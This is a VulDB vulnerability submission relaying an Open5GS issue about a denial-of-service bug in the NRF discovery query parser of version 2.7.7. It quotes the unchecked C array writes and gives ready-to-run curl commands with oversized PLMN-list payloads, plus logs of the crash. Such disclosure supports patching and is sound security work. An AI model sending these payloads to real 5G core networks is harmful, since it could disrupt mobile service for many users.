提交 #808511: Open5gs NRF v2.7.7 Denial of Service信息

标题Open5gs NRF v2.7.7 Denial of Service
描述### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description NRF crashes in the common discovery query parser when either `target-plmn-list` or `requester-plmn-list` contains more than `OGS_MAX_NUM_OF_PLMN` entries. The discovery option stores both PLMN lists in fixed-size arrays of length 12: ```c #define OGS_MAX_NUM_OF_PLMN 12 ... ogs_plmn_id_t target_plmn_list[OGS_MAX_NUM_OF_PLMN]; ogs_plmn_id_t requester_plmn_list[OGS_MAX_NUM_OF_PLMN]; ``` However, request parsing calls `ogs_sbi_discovery_option_parse_plmn_list()` directly for both query parameters: ```c discovery_option->num_of_target_plmn_list = ogs_sbi_discovery_option_parse_plmn_list( discovery_option->target_plmn_list, v); discovery_option->num_of_requester_plmn_list = ogs_sbi_discovery_option_parse_plmn_list( discovery_option->requester_plmn_list, v); ``` and `ogs_sbi_parse_plmn_list()` copies each decoded PLMN into the supplied fixed-size array without any bounds check: ```c ogs_plmn_id_build(plmn_list + num_of_plmn_list, atoi(PlmnId->mcc), atoi(PlmnId->mnc), strlen(PlmnId->mnc)); num_of_plmn_list++; ``` As a result, a PLMN list with 13 or more entries causes out-of-bounds writes and live-process segmentation faults. ### Steps to reproduce Oversized `target-plmn-list`: ```bash payload=$(python3 - <<'PY' import json arr=[{"mcc":"001","mnc":"01"} for _ in range(13)] print(json.dumps(arr, separators=(",",":"))) PY ) curl --http2-prior-knowledge -m 5 -sS -i --get \ 'http://10.33.33.3/nnrf-disc/v1/nf-instances' \ --data-urlencode 'target-nf-type=SMF' \ --data-urlencode 'requester-nf-type=AMF' \ --data-urlencode "target-plmn-list=$payload" ``` Oversized `requester-plmn-list`: ```bash payload=$(python3 - <<'PY' import json arr=[{"mcc":"001","mnc":"01"} for _ in range(64)] print(json.dumps(arr, separators=(",",":"))) PY ) curl --http2-prior-knowledge -m 5 -sS -i --get \ 'http://10.33.33.3/nnrf-disc/v1/nf-instances' \ --data-urlencode 'target-nf-type=SMF' \ --data-urlencode 'requester-nf-type=AMF' \ --data-urlencode "requester-plmn-list=$payload" ``` Then check: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf docker logs --tail 20 nrf ``` ### Logs ```shell Oversized `target-plmn-list`: curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream exited 139 2026-04-10T17:38:40.722393861Z Oversized `requester-plmn-list`: curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T17:32:59.315423742Z ``` ### Expected behaviour NRF should reject oversized PLMN list discovery parameters with a normal HTTP error response and remain running. ### Observed Behaviour The discovery request corrupts memory, the connection is aborted, and the NRF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
来源⚠️ https://github.com/open5gs/open5gs/issues/4459
用户
 LinJu (UID 97503)
提交2026-04-20 21時51分 (1 月前)
管理2026-05-16 12時09分 (26 days later)
状态重复
VulDB条目364317 [Open5GS 直到 2.7.7 NRF /lib/sbi/conv.c ogs_sbi_discovery_option_parse_plmn_list target-plmn-list 拒绝服务]
积分0

上一步一览下一步

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!